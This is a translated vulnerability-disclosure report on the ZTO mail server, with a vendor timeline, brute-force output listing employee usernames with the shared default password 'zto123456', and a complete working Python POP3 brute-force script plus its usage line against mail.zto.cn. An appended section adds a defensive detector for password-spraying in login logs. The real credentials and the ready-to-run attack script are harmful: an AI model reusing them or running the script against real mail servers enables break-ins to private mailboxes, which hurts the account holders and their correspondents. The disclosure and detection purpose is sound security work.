2015-11-26: Details reported to the vendor, awaiting vendor handling
2015-11-26: Vendor confirmed; details disclosed to the vendor only
2015-12-06: Details disclosed to core white hats and relevant domain experts
2015-12-16: Details disclosed to ordinary white hats
2015-12-26: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

As titled.
1. URL: http://mail.zto.cn/index.php
[+] Login successful: zhouyanan zto123456
[+] Mail: 18882 emails
[+] Login successful: wangfang zto123456
[+] Mail: 212 emails
[+] Login successful: liyong zto123456
[+] Mail: 9 emails
[+] Login successful: liuting zto123456
[+] Mail: 44 emails
[+] Login successful: xiaoqian zto123456
[+] Mail: 16 emails
[+] Login successful: qiuline zto123456
[+] Mail: 109 emails
[+] Login successful: liping zto123456
[+] Mail: 957 emails
[+] Login successful: yeqing zto123456
[+] Mail: 273 emails
[+] Login successful: wangbin zto123456
[+] Mail: 205 emails
[-] Done

Summary: zto123456 appears to be the default password.

2. Logging into a mailbox to demonstrate the impact: nearly 20,000 messages exchanged with Dangdang and Tmall
Internal address book
Daily orders
Other sensitive information
More data could be collected and used to test further mailboxes.

The test code below has been verified to work and can be used for internal testing:
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys, poplib

# Exactly four arguments are expected (type, user list, word list, server);
# sys.argv[4] is read below, so an argv length of 4 would crash
if len(sys.argv) != 5:
    print "\t Note: 邮箱类型为:中通 \n"
    print "\t Note: 用户字典不需要域名后缀,例如zhangsan\n"
    print "\t Usage: 使用方法:./mail.py type <userlist> <wordlist> mail.domain.com\n"
    sys.exit(1)

server = sys.argv[4]
success = []

# Load the user and password lists; each handle is closed right after it is read
# (the original closed both in a finally block, which raised NameError if open() failed)
try:
    users_list = open(sys.argv[2], "r")
    users = users_list.readlines()
    users_list.close()
    words_list = open(sys.argv[3], "r")
    words = words_list.readlines()
    words_list.close()
except IOError:
    print "[-] Error: please check filename\n"
    sys.exit(1)

# Make sure the server answers on POP3 over SSL before doing anything else
try:
    pop = poplib.POP3_SSL(server, 995)
    welcome = pop.getwelcome()
    print welcome
    pop.quit()
except poplib.error_proto:
    welcome = "[-] Error: No Response,Something wrong!!!\n"
    sys.exit(1)

print "[+] Server:", server
print "[+] Users Loaded:", len(users)
print "[+] Words Loaded:", len(words)
print "[+] Server response:", welcome, "\n"


def mailbruteforce(listuser, listpwd, type):
    if len(listuser) < 1 or len(listpwd) < 1:
        print "[-] Error: An error occurred: No user or pass list\n"
        return 1
    for user in listuser:
        for passwd in listpwd:
            user = user.replace("\n", "")
            passwd = passwd.replace("\n", "")
            try:
                print "-" * 12
                print "[+] User:", user, "Password:", passwd
                #time.sleep(0.5)
                popserver = poplib.POP3_SSL(server, 995)
                popserver.user(user)
                auth = popserver.pass_(passwd)
                print auth
                if auth.split(' ')[0] == "+OK" or auth == "+OK":
                    # record user, password, message count and mailbox size
                    ret = (user, passwd, popserver.stat()[0], popserver.stat()[1])
                    success.append(ret)
                    print len(success)
                    popserver.quit()
                    break
                else:
                    popserver.quit()
                    continue
            except:
                # a failed login raises poplib.error_proto; it is swallowed here
                #print "An error occurred:", msg
                pass


if __name__ == '__main__':
    mailbruteforce(users, words, sys.argv[1])
    print "\t[+] have weakpass :\t", len(success)
    if len(success) >= 1:
        for ret in success:
            print "\n\n[+] Login successful:", ret[0], ret[1]
            print "\t[+] Mail:", ret[2], "emails"
    print "\n[-] Done"

Usage:
D:\Python>python mail\zto.py Winmail mail\zto.txt mail\pass\pass0.txt mail.zto.cn
Some parts of the code are not perfect, but it works.
You are more professional than I am! PS: SSO also has some problems; if the impact can be expanded, I will submit that later...
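The pattern the report demonstrates, one password tried against many accounts from a single source, is easy to spot on the server side. The following is an added example (not part of the original report and not ZTO's or Winmail's code) that parses POP3 login log lines in a constructed format, flags source addresses that touched many distinct accounts inside a short window, and lists which of those accounts actually authenticated, since those are the ones whose passwords must be reset. The log format, the regular expression and the sample lines are assumptions for this example; adapt `LINE_RE` to the real daemon's format.

```python
"""Detect a default-password sweep (password spraying) in POP3 login logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines resembling a generic POP3 daemon (assumed format).
# 203.0.113.5 tries six accounts in four seconds; 198.51.100.7 is a normal user.
SAMPLE_LOG = """\
2015-11-26 10:00:01 pop3-login: auth failed user=<alice> rip=203.0.113.5
2015-11-26 10:00:02 pop3-login: auth failed user=<bob> rip=203.0.113.5
2015-11-26 10:00:02 pop3-login: auth ok user=<carol> rip=203.0.113.5
2015-11-26 10:00:03 pop3-login: auth failed user=<dave> rip=203.0.113.5
2015-11-26 10:00:04 pop3-login: auth ok user=<erin> rip=203.0.113.5
2015-11-26 10:00:05 pop3-login: auth ok user=<frank> rip=203.0.113.5
2015-11-26 10:05:00 pop3-login: auth ok user=<alice> rip=198.51.100.7
2015-11-26 10:30:00 pop3-login: auth failed user=<alice> rip=198.51.100.7
"""

# Assumed line layout; replace with the pattern of the daemon actually in use.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) pop3-login: "
    r"auth (?P<result>ok|failed) user=<(?P<user>[^>]+)> rip=(?P<ip>[\d.]+)$"
)


def parse(log_text):
    """Turn log text into a list of login events; lines that do not match are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
            "ok": m["result"] == "ok",
            "user": m["user"],
            "ip": m["ip"],
        })
    return events


def detect_sweeps(events, window=timedelta(minutes=5), min_users=4):
    """Return {ip: sorted account names} for sources that tried at least
    `min_users` distinct accounts within `window`.

    The signal is breadth across accounts, not the failure count: a spray with
    a widely shared default password produces mostly successes."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        best = set()
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it fits inside `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            users = {e["user"] for e in evs[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            findings[ip] = sorted(best)
    return findings


def compromised_accounts(events, sweeps):
    """Accounts that authenticated successfully from a sweeping source.
    These need a forced password reset; failed attempts alone do not."""
    return sorted({e["user"] for e in events if e["ok"] and e["ip"] in sweeps})


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    sweeps = detect_sweeps(evs)
    for ip, users in sweeps.items():
        print("sweep from %s across %d accounts: %s" % (ip, len(users), ", ".join(users)))
    print("accounts to reset:", ", ".join(compromised_accounts(evs, sweeps)))
```

The threshold of four distinct accounts in five minutes is a starting point, not a rule; on a server where shared mail clients or a webmail gateway legitimately proxy many users from one address, key the detection on the client address reported by the gateway instead of the gateway itself. The underlying fix is still removing the shared default password: the detection only tells you which mailboxes were reached while it existed.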
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-11-26 11:53
Thank you for the white hat's hard work; we have contacted the person in charge to handle it. Please redact contact details and similar information next time, thank you.
None yet